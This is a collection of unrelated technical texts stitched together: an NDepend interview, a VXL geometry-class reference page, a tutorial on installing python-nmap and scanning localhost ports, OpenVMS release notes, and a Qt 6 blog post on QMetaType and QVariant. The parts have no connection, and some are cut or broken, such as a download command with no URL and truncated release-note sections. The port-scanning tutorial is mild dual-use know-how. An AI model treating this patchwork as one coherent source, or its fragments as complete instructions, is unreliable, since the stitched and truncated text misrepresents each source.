CQL covers a wide range of possibilities, from 82 code metrics to dependencies, encapsulation, mutability, code changes/diff/evolution or test coverage. For example, asking for methods that have been changed recently and are not fully covered by tests is as easy as writing:

METHODS WHERE CodeWasChanged AND PercentageCoverage < 100

NDepend comes with more than 200 rules by default, and you can modify existing rules and add new rules at whim to fit your needs. The other side of NDepend is its integration into the Continuous Integration/build server process. The idea is to get a daily, highly customized HTML report where you can see at a glance if some CQL rules have been violated, and also to get some metrics about quality or structuring. This is how one can master what is really happening in one's development shop.

Suprotim: Many teams have assemblies built in both C# and VB.NET. How does NDepend analyze such applications built using multiple languages?

Patrick: NDepend takes as input any .NET assemblies, no matter the language they were written in. 95% of the information gathered by NDepend comes from the assemblies themselves. NDepend also parses source files, but only a few metrics are gathered from source: Source Code Cyclomatic Complexity and comment metrics. So far only C# source files are parsed, and we plan VB.NET source file parsing for the coming months. More details about all this can be found here.

Suprotim: How would you compare NDepend with other popular tools like ReSharper and FxCop?

Patrick: I am a big fan of Resharper, and I like to think that what Resharper does locally, at the level of a method, NDepend does at large scale, on types, namespaces and assemblies.
Resharper typically warns about a flawed logical if expression, where NDepend typically warns about a component that is too big or too entangled. FxCop comes with more than 200 pre-defined rules. FxCop rules mainly inform you how to use the .NET Framework, and you also have a few quality rules. NDepend CQL rules are more focused on your code itself, although 30 pre-defined CQL rules cover some .NET Framework usage good practices. NDepend will typically let you know that some abstractions have to be created to avoid over-coupling, while FxCop rules will typically let you know that you should use a StringBuilder to concatenate strings inside a loop instead of using the '+' operator.

Suprotim: How does NDepend help in Agile projects where most of the effort is on delivering code?

Patrick: Agile development is all about rationalizing the work to avoid repetitive, burdensome tasks. Agile fosters efficient communication between developers and continuous correctness checks with automatic tests. The NDepend CQL language lets developers express their intentions in a formal way. For example, developers can create a specific rule to prevent UI code from directly using DB-related code. But as a big bonus, CQL rules are active; I mean you'll know automatically when a rule is violated. So not only do CQL rules improve the communication between developers, but they also prevent code erosion by discarding the burden of manually checking that developers respect the intentions and quality effort put into the code.

Suprotim: Tell us about a recent experience with NDepend in a real-world environment? Can we see a case study?

Patrick: There are various NDepend user profiles, from the independent consultant to the massive team cluster composed of hundreds of developers and millions of lines of code. Part of the NDepend challenge is to let users cope with very large code bases. To do so we constantly invest in the performance of our code.
We recently had feedback from one of these massive teams, and I wrote a blog post about their experience here: Using NDepend on large project, a success story. I also recently had the opportunity to help a 60-developer team getting started with NDepend concepts, and I wrote about this experience here. Basically, the more complex your code base is, the more you need tooling such as NDepend; especially if you wish to spend your resources efficiently on large-scale refactoring to transform a large legacy made of messy code into a sane development shop. NDepend can also be useful on smaller code bases. For example, you can read what NDepend has to say by analyzing the 15,000 lines of code of the NUnit project here:

Suprotim: Can dotnetcurry.com viewers see a Live Demo of this tool? Do we have an NDepend forum to discuss this tool?

Patrick: On our site we link a dozen short 3-minute screencasts that demonstrate how NDepend handles various scenarios, like comparing 2 snapshots of a code base, dependency browsing or quality metrics checking.

Suprotim: The NDepend product is loaded with features and metrics. What are your plans in 2009?

Patrick: In 2009 Q2, the two NDepend brothers, XDepend (for Java) and CppDepend (for C++), will see the light of day. A public beta of XDepend is already available on the XDepend website. NDepend is often described as a polished tool by its users, and in 2009 we wish to continue investing in even more usability. With System.Reflection everyone can write a quick static analyzer of .NET code in a few days, such as what NDepend was in its early days. What we learnt the hard way is that usability only comes at the cost of years of solid development, and IMHO usability is what makes the difference. Part of our 2009 usability plans is to integrate the VisualNDepend panels nicely into Visual Studio, but one can also expect dozens of tricky featurettes.
We also have several major innovative features in the pipe, but for confidentiality reasons I cannot unveil them now. For the benefit of all .NET developers (our team included), the .NET tooling scene is very active these days, and we will continue investing in features that, so far, no other tools have.

I hope you enjoyed this interview with Patrick. Here's some simple advice to all of you: understand and list the metrics that are important to your product/project. Then strive towards achieving them with a tool like NDepend that will keep you on track! If you have any questions for Patrick, you can use the Comments section below.
http://www.dotnetcurry.com/(X(1)S(ckvzil55252hloaarygxx3ya))/ShowArticle.aspx?ID=268
a point in 2D nonhomogeneous space More...

#include <vcl_iosfwd.h>
#include <vgl/vgl_fwd.h>
#include <vgl/vgl_vector_2d.h>
#include <vcl_cassert.h>
#include <vcl_vector.h>

Go to the source code of this file.

a point in 2D nonhomogeneous space

Modifications
29 June 2001 Peter Vanroose moved arithmetic operators to new vgl_vector_2d
2 July 2001 Peter Vanroose implemented constructor from homg point
21 May 2009 Peter Vanroose istream operator>> re-implemented

Definition in file vgl_point_2d.h.

Definition at line 262 of file vgl_point_2d.h.

Return the point at the centre of gravity of two given points. Identical to midpoint(p1,p2). Definition at line 219 of file vgl_point_2d.h.

Return the point at the centre of gravity of three given points. Definition at line 229 of file vgl_point_2d.h.

Return the point at the centre of gravity of four given points. Definition at line 240 of file vgl_point_2d.h.

Return the point at the centre of gravity of a set of given points. Beware of possible rounding errors when Type is e.g. int. Definition at line 253 of file vgl_point_2d.h.

Are three points collinear, i.e., do they lie on a common line? Definition at line 180 of file vgl_point_2d.h.

Return true iff the point is at infinity (an ideal point). Always returns false. Definition at line 115 of file vgl_point_2d.h.

Return the point at a given ratio wrt two other points. By default, the mid point (ratio=0.5) is returned. Note that the third argument is Type, not double, so the midpoint of e.g. two vgl_point_2d<int> is not a valid concept. But the reflection point of p2 wrt p1 is: in that case f=-1. Definition at line 206 of file vgl_point_2d.h.

Adding a vector to a point gives a new point at the end of that vector. Note that vector + point is not defined! It's always point + vector. Definition at line 128 of file vgl_point_2d.h.

Adding a vector to a point gives the point at the end of that vector. Definition at line 135 of file vgl_point_2d.h.
The difference of two points is the vector from second to first point. Definition at line 120 of file vgl_point_2d.h.

Subtracting a vector from a point is the same as adding the inverse vector. Definition at line 142 of file vgl_point_2d.h.

Subtracting a vector from a point is the same as adding the inverse vector. Definition at line 149 of file vgl_point_2d.h.

Write "<vgl_point_2d x,y>" to stream. Definition at line 48 of file vgl_point_2d.txx.

Read from stream, possibly with formatting. Either just reads two blank-separated numbers, or reads two comma-separated numbers, or reads two numbers in parenthesized form "(123, 321)". Definition at line 81 of file vgl_point_2d.txx.

The mid point of e.g. two vgl_point_2d<int> need not be an int. Definition at line 194 of file vgl_point_2d.h.
http://public.kitware.com/vxl/doc/release/core/vgl/html/vgl__point__2d_8h.html
In this tutorial, I will teach you how to install a Python library which helps in using the nmap port scanner. The library is called python-nmap.

What is nmap

"Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich)[1] used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyzes the responses."

Read more about nmap on the wiki page and Nmap Commands.

Install python-nmap in Linux

1. Open a new terminal and use the wget utility to download the python-nmap library. For Python 2.x, use python-nmap-0.1.4.tar.gz.

$ wget

2. Once the download is finished, extract the contents with the tar utility and install the library.

$ tar xf python-nmap-0.1.4.tar.gz
$ cd python-nmap-0.1.4
$ python setup.py install

Verify that the python-nmap library is installed properly. On Ubuntu and Debian distributions, to install python-nmap, use:

$ sudo apt-get update
$ sudo apt-get install python-nmap

How to use python-nmap

1. Open a new terminal, and run Python with the following command.

python

2. Import the nmap module.

import nmap
test = nmap.PortScanner()

3. Use the following line to scan your localhost for open ports.

test_scanner = test.scan('127.0.0.1', '80')

4. Print the test_scanner variable.

>>> test_scanner
{'nmap': {'scanstats': {'uphosts': u'1', 'timestr': u'Fri Dec 20 21:33:55 2013', 'downhosts': u'0', 'totalhosts': u'1', 'elapsed': u'0.12'}, 'scaninfo': {u'tcp': {'services': u'80', 'method': u'syn'}}, 'command_line': u'nmap -oX - -p 80 -sV 127.0.0.1'}, 'scan': {u'127.0.0.1': {'status': {'state': u'up', 'reason': u'localhost-response'}, 'hostname': u'localhost', u'tcp': {80: {'state': u'closed', 'reason': u'reset', 'name': u'http'}}}}}

As you can see from the above output, a nested dictionary is printed on the screen. It has information about the host status, command-line arguments and port state.

5.
Use the following piece of code to get information about the command used by nmap in our example.

test_scanner['nmap']['command_line']

Here is the output.

u'nmap -oX - -p 80 -sV 127.0.0.1'

Conclusion

In this article, we learned how to install python-nmap on Linux. This library helps network administrators automate scanning tasks and use nmap from Python scripts. Please let us know your suggestions.

Comments

A reader reported this error:

Traceback (most recent call last):
  File "", line 1, in
  File "/usr/local/lib/python2.7/dist-packages/nmap/nmap.py", line 137, in __init__
    raise PortScannerError('nmap program was not found in path')
nmap.nmap.PortScannerError: 'nmap program was not found in path'

Hi David, make sure you have installed nmap and that it is in your $PATH:

$ sudo apt install nmap
$ echo $PATH
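Since the scan result is just a nested dictionary, it can be walked with ordinary Python. The sketch below hard-codes a result shaped like the output shown above (no live scan, so nmap does not need to be installed to try it) and pulls out each host's port states:

```python
# A result dict shaped like python-nmap's scan() output shown above
# (hard-coded sample; in a real run this would come from test.scan(...)).
result = {
    'nmap': {
        'command_line': 'nmap -oX - -p 80 -sV 127.0.0.1',
        'scaninfo': {'tcp': {'services': '80', 'method': 'syn'}},
    },
    'scan': {
        '127.0.0.1': {
            'status': {'state': 'up', 'reason': 'localhost-response'},
            'hostname': 'localhost',
            'tcp': {80: {'state': 'closed', 'reason': 'reset', 'name': 'http'}},
        },
    },
}

# The nmap invocation that produced this result.
print(result['nmap']['command_line'])

# Walk every scanned host and report the state of each TCP port.
for host, info in result['scan'].items():
    print(host, 'is', info['status']['state'])
    for port, details in sorted(info.get('tcp', {}).items()):
        print('  port', port, details['name'], '->', details['state'])
```

The same loop works unchanged on a real scan of many hosts and ports, since python-nmap keys the 'scan' dict by host address and the per-host 'tcp' dict by port number.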
https://linoxide.com/python-nmap-library/
This chapter provides release notes about application and system programming on OpenVMS systems.

5.1 Incorrect Prototype Declared in lib$routines.h File V8.4

The prototype lib$stat_vm_64, declared in lib$routines.h, has been corrected to match its definition:

#ifdef __NEW_STARLET
unsigned int lib$stat_vm_64(
    __int64 *code,
    unsigned __int64 *value_argument);
#else /* __OLD_STARLET */
unsigned int lib$stat_vm_64(__unknown_params);
#endif /* #ifdef __NEW_STARLET */

On OpenVMS Alpha Version 8.4, when you set breakpoints, the debugger will not be able to differentiate between FORTRAN functions and declared variables of the same name in different compilation units.

5.3 C++ Run-Time Library V8.3-1H1

Problems corrected in OpenVMS Version 8.3-1H1 include the following:

cxxl$set_condition(pure_unix);

The condition_behavior enum declared in the <cxx_exception.h> header has been extended to include the pure_unix member.

#include <stdio.h>
#include <cxx_exception.h>

void generateACCVIO() { *((int*)0) = 0; }

int main() {
    cxxl$set_condition(pure_unix);
    try {
        generateACCVIO();
    } catch(...) {
        puts("caught");
    }
}

The following problems are fixed in this version of the C++ Library (Version 7.3 and higher compiler):

#include <vector>

int main() {
    std::vector<int> v;
    v.push_back(0);
}

istream_type& get(char_type *s, streamsize n, char_type delim);
istream_type& get(char_type *s, streamsize n);
However, that section does not make clear how AST delivery behaves in programs with upcalls disabled (which is the default configuration). In a program with upcalls disabled, user-mode ASTs will interrupt the thread that is executing when the AST is delivered. Therefore, the AST service routine cannot make any assumptions about the context in which it executes (with respect to thread ID, stack space available, and so on.) Also, note that much of the material in Section B.12.5 of the Guide describes a possible future version of OpenVMS. The description of generalized "per-thread" or thread-targeted ASTs represents possible future enhancements to the operating system. In all OpenVMS releases to date, however, user-mode ASTs are treated as if they are directed to the process as a whole. 5.6 RMS $PARSE Validation of Directory Files Starting with OpenVMS Version 8.3, the $PARSE service further validates all directories named in a directory specification to ensure that the directory characteristic is set. In previous OpenVMS versions, attempting to use a file with a .DIR extension that was not a directory resulted in a SS$_BADIRECTORY error from the $OPEN service, but not necessarily from the $PARSE service. As of Version 8.3, the error is consistently returned by the $PARSE service as long as it is not a syntax-only $PARSE. 5.7 No-IOLOCK8 Fibre Channel Port Drivers Many I/O subsystem components synchronize their operations across CPUs using the IOLOCK8 spinlock, which has made acquiring the spinlock a performance bottleneck. Starting with Version 8.3-1H1, each Fibre Channel port driver (SYS$PGQDRIVER, SYS$PGADRIVER and SYS$FGEDRIVER) device uses its own port-specific spinlock instead of IOLOCK8 to synchronize its internal operations. In most configurations, this results in a significant decrease in the amount of time each CPU spends waiting for the IOLOCK8 spinlock as well as some increase in the Fibre Channel I/O rate. 
Some minor changes are required to any class driver that connects to one of these new port drivers, so customers must determine whether they are running any non-HP class drivers that will not work with them. The simplest way to do this is to examine the output of the SDA command CLUE SCSI/SUMMARY and see whether the name of any third-party class driver device appears in the device hierarchy for an FGx0 or PGx0 port device in the "Device" column. For more information, refer to the notes following this sample SDA session.

$ ANALYZE/SYSTEM

OpenVMS system analyzer

SDA> CLUE SCSI /SUMMARY

SCSI Summary Configuration:
---------------------------

SPDT     Port  STDT     SCSI-Id  SCDT     SCSI-Lun  Device    UCB       Type    Rev
-------- ----  -------- -------  -------- --------  --------  --------  ------  ----
81624200 FGB0  8162CDC0 3        8162D240 0         GGA22     8162F380  HSV200
                                 8162F180 1         DGA22801  8162FD40  HSV200  6100
                                 81632900 2         DGA22802  81632AC0  HSV200  6100
                                 816354C0 3         DGA22803  81635680  HSV200  6100
                                 81638080 4         DGA22804  81638240  HSV200  6100
               8162D400 4        8162DD80 0         GGA22     8163AC40  MRD200
                                 8163B5C0 1         RJA22801  8163B780  RFD200  6100
                                 8163C840 2         RJA22802  8163CA00  RFD200  6100
                                 8163DAC0 3         RJA22803  8163DC80  RFD200  6100
                                 8163ED40 4         RJA22804  8163EF00  RFD200  6100

Even though the physical device of Type MRD200 is not an HP-qualified device, it does not present an IOLOCK8 problem, because it is accessed through a GGAx unit, indicating that it uses the modified HP generic class driver SYS$GKDRIVER. The RJA devices are not controlled by a modified HP class driver; they will not work with the new port drivers.

The C++ Version 7.2 compiler for OpenVMS Integrity servers predefines the macro __INITIAL_POINTER_SIZE to 0, unlike the C++ Version 7.1 compiler, which leaves it undefined. This is an intentional change that makes C++ Version 7.2 consistent with the C compiler and provides support for pointer_size pragmas, which C++ Version 7.1 does not.
This change can cause diagnostics to appear in code that compiled cleanly with certain declarations selected by system header files that declare pointer types. This effect is most likely to appear in applications that use starlet headers and that compile with __NEW_STARLET defined. If you cannot modify the application source code to conform to the new declarations, add the command-line qualifier /UNDEF=__INITIAL_POINTER_SIZE to the CXX command line to prevent the C++ Version 7.2 compiler from predefining this macro, thus causing the system headers to provide the same declarations as with Version 7.1 of the compiler.

5.9 Building DCE IDL C++ Applications

Building DCE IDL C++ applications on CXX Version 7.2 and higher results in an undefined symbol linker warning. This is a known issue. To overcome this warning, contact HP Support Services to request any necessary patches.

5.10 Privileged Programs may Need a Recompile (Alpha Only) V8.2

OpenVMS Alpha Version 8.2 is a major version release in which a number of privileged data structures have changed. It may be necessary to recompile and relink privileged programs.

5.11 Privileged Data Structures Updates

OpenVMS Version 8.2 contains updates for a number of privileged data structures. These changes apply to both Alpha and Integrity servers. The versions of these subsystems are linked to the operating system version.

5.11.1 KPB Extensions

Prior versions of OpenVMS supported the use of KPBs for kernel mode above IPL 2. To facilitate the transition to Integrity servers, usage of KPBs has been expanded for use in outer modes and all IPLs. This change allows certain code that previously had private threading packages to make use of KPBs on both Alpha and Integrity servers. In order to support these changes to the kernel processes, some changes to the KPB structure were required. No source changes should be necessary for existing Alpha code.

5.11.2 CPU Name Space

OpenVMS currently has an architectural limit of a maximum CPU ID of 31.
Various internal data structures and data cells have allocated 32 bits for CPU masks. The space allocated for masks is being increased to 64 bits on Alpha and 1024 bits on Integrity servers to allow support for more CPUs in the future.

5.11.3 64-Bit Logical Block Number (LBN)

OpenVMS supports LBNs of only 32 bits. This limits the support of a disk volume to 2 TiB. The space allocated for internal LBN fields is being increased to 64 bits to allow support for larger disk volumes in the future. The existing longword LBN symbols will still be maintained and will be overlaid with a quadword symbol.

5.11.4 Forking to a Dynamic Spinlock

This capability is added. Code should use the symbol FKB$C_LENGTH for the size of an FKB. HP recommends that you use the provided internal routines to link and unlink.

5.11.7 Per-Thread Security Impacts Privileged Code and Device Drivers (Permanent Change)

The method used to attach a PSB to an IRP is illustrated by the following fragment:

    #include <security-macros.h>

    /* Increment REFCNT of PSB that is now shared by both IRPs */
    nsa_std$reference_psb( irp->irp$ar_psb );

Device drivers must be updated accordingly.

5.12 Applications Using Floating-Point Data V8.3

For details of floating-point behavior on the Itanium architecture used by Integrity servers, refer to the OpenVMS Floating-Point White Paper on the following website:

The filter is required only to make certain details of floating-point exceptions conform to the IEEE standard. It is not required for normal floating-point operation.

5.12.2 Ada Event Support (Integrity servers Only) V8.3

Ada event support (SET BREAK/EVENT=ada_event, where ada_event is one of the events described by SHOW EVENT) is enabled on OpenVMS Integrity servers. However, this support is incomplete. If you encounter problems with event breakpoints, switch to pthread events (SET EVENT_FACILITY pthread) as a workaround. Note that not all Ada events have an equivalent in the pthreads facility.

5.12.3 C++ Language Issues (Integrity servers Only)

Condition: The debugger does not support debugging C++ programs compiled with /OPTIMIZE.
Workaround: Compile C++ programs with /NOOPTIMIZE.

5.13 Ada Compiler (Integrity servers Only)

GNAT Pro (Ada 83, Ada 95, and Ada 2005) is available from AdaCore. Contact AdaCore at sales@adacore.com for more information.

5.16 C Run-Time Library

The following sections describe changes and corrections to the C Run-Time Library (RTL).

5.16.1 C RTL TCP/IP Header File Updates

The C RTL ships header files for users to call TCP/IP. The C RTL places the headers into the C RTL header library (DECC$RTLDEF.TLB). New header files are added, as appropriate, for new features in TCP/IP:

    SCTP.H
    SCTP_UIO.H

These header files provide Stream Control Transmission Protocol (SCTP) support. For more information on SCTP, see the HP TCP/IP Services for OpenVMS Version 5.7 Release Notes.

5.16.3 … that the C RTL selects the appropriate prefixing for the listed functions.

5.16.5 Header File <builtins.h>: __CMP_SWAP* and _Interlocked* Visible to C++

The compare-and-swap built-ins (__CMP_SWAP* and _Interlocked*) in <builtins.h> were previously not visible to the OpenVMS Alpha C++ compiler. Because HP C++ Version 7.1 requires them, a change in conditional compilation now makes these built-ins visible.

5.16.6 Builtin __fci Added for Integrity servers

The <builtins.h> header file is updated with the prototype for the new __fci built-in (a built-in for the fc.i instruction) now supported by the HP C compiler.
What's New in QMetaType + QVariant

Wednesday October 21, 2020 by Fabian Kosmale

As you might know, Qt has a metatype system which provides run-time dynamic information about types. It enables storing your types in QVariant, queued connections in the signal/slot system, and is used throughout the QML engine. With the upcoming Qt 6.0 release, we used the chance to revisit its fundamentals and make use of the functionality that C++17 gives us. In the following, we examine those changes and explain how they might affect your projects.

QMetaType knows your types even better now

In Qt 5, QMetaType contained the information necessary to default-construct a type, to copy it and to destroy it. Moreover, it knew how to save it to and load it from QDataStream, and stored some flags to describe various properties of it (e.g. whether the type is trivial, an enumeration, etc.). Additionally, it would store the QMetaObject of the type if it had any, as well as a numeric id to identify the type and the type's name. Lastly, QMetaType contained functionality to compare objects of a certain (meta-)type, to print them with qDebug and to convert from one type to another. You had to use QMetaType::registerComparators() and the other static register functions in QMetaType to actually make use of that functionality, though. That would put pointers to those functions into corresponding registries, basically mappings from metatype ids to function pointers.

With Qt 6, the first thing we did was to extend the information stored in QMetaType: Modern C++ is now almost 10 years old, so it was about time to store information about the move constructor in QMetaType. And to provide better support for overaligned types, we now also store the alignment requirements of your types. Moreover, we considered the registries to be a bit clunky. After all, why should we require you to call QMetaType::registerEqualsComparator() when we could already know this by simply looking at the type?
So in Qt 6, QMetaType::registerEqualsComparator, QMetaType::registerComparators, qRegisterMetaTypeStreamOperators and QMetaType::registerDebugStreamOperator have been removed. The metatype system will instead know about those automatically. The outlier here is QMetaType::registerConverterFunction: as there is no way to reliably know which functions should be used for conversions, and we allow registering basically arbitrary conversions, that functionality stays the same as it was in Qt 5.

With those changes we could also unify the handling of Qt internal types and user-registered types. This means that, for instance, QMetaType::compare now works with int:

```cpp
#include <QMetaType>
#include <QDebug>

int main()
{
    int i = 1;
    int j = 2;
    int result = 0;
    const bool ok = QMetaType::compare(&i, &j, QMetaType::Int, &result);
    if (ok) {
        // prints -1 as expected in Qt 6
        qDebug() << result;
    } else {
        // This would get printed in Qt 5
        qDebug() << "Cannot compare integer with QMetaType :-(";
    }
}
```

QMetaType knows your types at compile time

Thanks to various advancements in C++'s reflective capabilities, we can now get all the information we require from a type at compile time – including its name. If you are interested in how this is implemented, you should look at this excellent StackOverflow answer. In Qt we use a very similar approach, albeit with certain extensions and workarounds for older compilers.

What's even more interesting than the implementation, though, is what it means for you. First of all, instead of creating a QMetaType via either

```cpp
QMetaType oldWay1 = QMetaType::fromName("KnownTypeName");
```

or

```cpp
QMetaType oldWay2(knownTypeID);
```

it is now recommended that you create your QMetaTypes with

```cpp
QMetaType newWay = QMetaType::fromType<MyType>();
```

if you know the type. The other methods still exist, and are useful when you do not know the type at compile time. However, fromType avoids one lookup from id/name to QMetaType at runtime.
Note that since Qt 5.15 you could already use fromType, but there it would still do a lookup. Moreover, you could not copy QMetaType, which limited its usefulness and made it more convenient to pass type ids around. In Qt 6, however, QMetaType is copyable.

You might now wonder what this means for Q_DECLARE_METATYPE and qRegisterMetaType. After all, do we really need them if we can create QMetaTypes at compile time? Let's look at an example first:

```cpp
#include <QMetaType>
#include <QVariant>
#include <QDebug>

struct MyType
{
    int i = 42;
    friend QDebug operator<<(QDebug dbg, MyType t)
    {
        QDebugStateSaver saver(dbg);
        dbg.nospace() << "MyType with i = " << t.i;
        return dbg;
    }
};

int main()
{
    MyType myInstance;
    QVariant var = QVariant::fromValue(myInstance);
    qDebug() << var;
}
```

In Qt 5, this would lead to the following error message with gcc (plus a few more warnings about failed instantiations):

```
/usr/include/qt/QtCore/qmetatype.h: In instantiation of 'constexpr int qMetaTypeId() [with T = MyType]':
/usr/include/qt/QtCore/qvariant.h:371:37:   required from 'static QVariant QVariant::fromValue(const T&) [with T = MyType]'
test.cpp:16:48:   required from here
/usr/include/qt/QtCore/qglobal.h:121:63: error: static assertion failed: Type is not registered, please use the Q_DECLARE_METATYPE macro to make it known to Qt's meta-object system
  121 | # define Q_STATIC_ASSERT_X(Condition, Message) static_assert(bool(Condition), Message)
      |                                                               ^~~~~~~~~~~~~~~
/usr/include/qt/QtCore/qmetatype.h:1916:5: note: in expansion of macro 'Q_STATIC_ASSERT_X'
 1916 |     Q_STATIC_ASSERT_X(QMetaTypeId2<T>::Defined, "Type is not registered, please use the Q_DECLARE_METATYPE macro to make it known to Qt's meta-object system");
```

That's not great, but at least it tells you that you need to use Q_DECLARE_METATYPE. However, with Qt 6, it will compile just fine, and the executable will print QVariant(MyType, MyType with i = 42), as one would expect.
And not only QVariant, but queued connections work too without an explicit Q_DECLARE_METATYPE. Now, what about qRegisterMetaType? That one is unfortunately still needed – assuming you need name-to-type lookups. While a QMetaType object knows the name of the type it has been constructed from, the global name-to-metatype mapping is only established once qRegisterMetaType is called. To illustrate:

```cpp
struct Custom {};

const auto myMetaType = QMetaType::fromType<Custom>();
// At this point, we do not know that the name "Custom" maps to the type Custom
int id = QMetaType::type("Custom");
Q_ASSERT(id == QMetaType::UnknownType);

qRegisterMetaType<Custom>();
// from now on, the name -> type mapping works, too
id = QMetaType::type("Custom");
Q_ASSERT(id == myMetaType.id());
```

Having the name-to-type mappings available is still required if you use old-style signal-slot connections, or when using QMetaObject::invokeMethod.

QMetaType knows your properties' and methods' types

The ability to create QMetaTypes at compile time also allows us to store the metatypes of a class' properties in its QMetaObject. This change is mainly motivated by QML, where it brings us enhanced performance and, in the future, hopefully reduced memory consumption.[1] Unfortunately, this change puts a new requirement on the types used in property declarations: the type (or, if it's a pointer/reference, the pointed-to type) needs to be complete when moc sees it. To illustrate the issue, consider the following example:

```cpp
// example.h
#include <QObject>

struct S;

class MyClass : public QObject
{
    Q_OBJECT
    Q_PROPERTY(S* m_s MEMBER m_s);
    S *m_s = nullptr;
public:
    MyClass(QObject *parent = nullptr) : QObject(parent) {}
};
```

In Qt 5, there wasn't an issue with this.
However, in Qt 6, you might get an error like

```
In file included from qt/qtbase/include/QtCore/qmetatype.h:1,
                 from qt/qtbase/include/QtCore/../../../../qtdev/qtbase/src/corelib/kernel/qobject.h:54,
                 from qt/qtbase/include/QtCore/qobject.h:1,
                 from qt/qtbase/include/QtCore/QObject:1,
                 from example.h:1,
                 from moc_example.cpp:10:
qt/qtbase/include/QtCore/../../../../qtdev/qtbase/src/corelib/kernel/qmetatype.h: In instantiation of 'struct QtPrivate::IsPointerToTypeDerivedFromQObject<S*>':
qt/qtbase/include/QtCore/../../../../qtdev/qtbase/src/corelib/kernel/qmetatype.h:1073:63:   required from 'struct QtPrivate::QMetaTypeTypeFlags<S*>'
qt/qtbase/include/QtCore/../../../../qtdev/qtbase/src/corelib/kernel/qmetatype.h:2187:40:   required from 'QtPrivate::QMetaTypeInterface QtPrivate::QMetaTypeForType<S*>::metaType'
qt/qtbase/include/QtCore/../../../../qtdev/qtbase/src/corelib/kernel/qmetatype.h:2309:16:   required from 'constexpr QtPrivate::QMetaTypeInterface* QtPrivate::qTryMetaTypeInterfaceForType() [with Unique = qt_meta_stringdata_MyClass_t; TypeCompletePair = QtPrivate::TypeAndForceComplete<S*, std::integral_constant<bool, true> >]'
qt/qtbase/include/QtCore/../../../../qtdev/qtbase/src/corelib/kernel/qmetatype.h:2328:55:   required from 'QtPrivate::QMetaTypeInterface* const qt_incomplete_metaTypeArray<qt_meta_stringdata_MyClass_t, QtPrivate::TypeAndForceComplete<S*, std::integral_constant<bool, true> > > [1]'
moc_example.cpp:102:1:   required from here
qt/qtbase/include/QtCore/../../../../qtdev/qtbase/src/corelib/kernel/qmetatype.h:766:23: error: invalid application of 'sizeof' to incomplete type 'S'
  766 |     static_assert(sizeof(T), "Type argument of Q_PROPERTY or Q_DECLARE_METATYPE(T*) must be fully defined");
      |                       ^~~~~~~~~
make: *** [Makefile:882: moc_example.o] Error 1
```

Note the static assert, which tells you that the type must be fully defined. This can be fixed in three different ways:

- Instead of forward declaring the class, simply include the header in which S is defined.
- As including additional headers can negatively affect build times, you can use the Q_MOC_INCLUDE macro instead; then only moc will see the include. Simply use Q_MOC_INCLUDE("myheader.h") instead of #include "myheader.h".
- Alternatively, you could include the moc-generated file in your cpp file. This of course requires that the needed header is actually included there.[2]

Lastly, there are rare cases where you have an intentionally opaque pointer. In that case, you need to use Q_DECLARE_OPAQUE_POINTER. This is certainly suboptimal, though in our experience properties with incomplete types are not that common. In addition, we're currently investigating extending our tooling support to make at least the detection of this issue automatic.

Similarly, we also try to create the metatypes for return types and parameters of methods known to the metaobject system (signals, slots and Q_INVOKABLE functions). This has the advantage of avoiding a few name-to-type lookups in string-based connections and inside the QML engine. However, we are aware that incomplete types are very common in methods. Therefore, for methods we still have a fallback path, and method types are not required to be complete, so no changes are needed there. If we can, we store the metatype at compile time in the metaobject; if not, we will simply look it up at runtime. There's one exception, though: if you register your class with QML by using one of the declarative type registration macros (QML_ELEMENT and friends), we require even method types to be complete. In that case we assume that all metamethods which you expose are actually meant to be used in QML, and you therefore prefer to avoid any additional runtime type lookups (note that this does not affect the parent class' metamethods).

QMetaType powers QVariant

After we reworked QMetaType, we could also clean up the internals of our venerable QVariant class.
Before Qt 6, QVariant internally distinguished between user types and builtin Qt types, significantly complicating the class. QVariant also could only store values that were at most the size of the maximum of sizeof(void *) and sizeof(double) in its internal buffer. Anything else would be heap allocated. With Qt 6, "anything else" would include commonly used classes like QString (as QString is 3 * sizeof(void *) big in Qt 6). So clearly we had to rework QVariant for Qt 6.

And rework it we did! We managed to simplify its internal architecture and made common use cases faster. This includes changing QVariant so that it now stores types <= 3 * sizeof(void *) in its SSO buffer. Besides allowing the continued storage of QStrings without additional allocations, this also makes it possible to store polymorphic PIMPL'd types like QImage[3] in QVariant. This should prove beneficial for item models returning images in data().

We also introduced some behaviour changes in existing methods of QVariant. We are aware that silent behaviour changes are a common source of bugs, but deemed the current behaviour to be bug-prone enough to warrant it. Here's the list of what changed:

- QVariant used to forward isNull() calls to its contained type – but only for a limited set of Qt's own types. This has been changed, and isNull() now only returns true if the QVariant is empty or contains a nullptr.
- QVariant's operator== now uses QMetaType::equals for the comparison. This implies a behavioural change for some graphical types like QPixmap, QImage and QIcon, which will never compare equal in Qt 6 (as they do not have a comparison operator). Moreover, floating-point numbers inside a QVariant are now no longer compared via qFuzzyCompare, but instead use exact comparisons.

Another noteworthy change is that we removed QVariant's constructor taking a QDataStream.
Instead of constructing a QVariant holding a QDataStream (which would be in line with the other constructors), it would instead attempt to load a QVariant from the data stream. If you actually want this behaviour, use operator>> instead.

Note also that QVariant::Type and its related methods have been deprecated in Qt 6 (but still exist). A replacement API working with QMetaType::Type has been added. This is useful, as QVariant::type() can only return QVariant::UserType for user types, whereas the new QVariant::typeId() always returns the concrete metatype. QVariant::userType does the same (and did so already in Qt 5), but from its name it wasn't apparent that it also works for builtin types.

Lastly, we added some new functionality to QVariant:

- QVariant::compare(const QVariant &lhs, const QVariant &rhs) can be used to compare two variants. It returns a std::optional<int>. If the values were incomparable (because the types are different, or because the type itself is not comparable), std::nullopt is returned. Otherwise, an optional containing an int is returned: the number is negative if the contained value in lhs is smaller than the one in rhs, 0 if they are equal, and positive otherwise.
- It's now possible to construct an empty QVariant from a QMetaType (instead of passing in a QMetaType::Type, which would then be used to construct a QMetaType). For similar reasons, it's possible to pass a QMetaType to the convert function.
- QVariant now supports storing overaligned types, thanks to QMetaType storing alignment information in Qt 6.

Conclusion and Outlook

The internals of Qt's metatype system are a part of Qt which most users rarely interact with. Nevertheless, it's at the heart of the framework, and is used to implement more user-centric parts like QML, QVariant, QtDbus, Qt Remote Objects and ActiveQt. With the updates to it in Qt 6, we hope to have it serve us as well in the next decade as it did in the last.
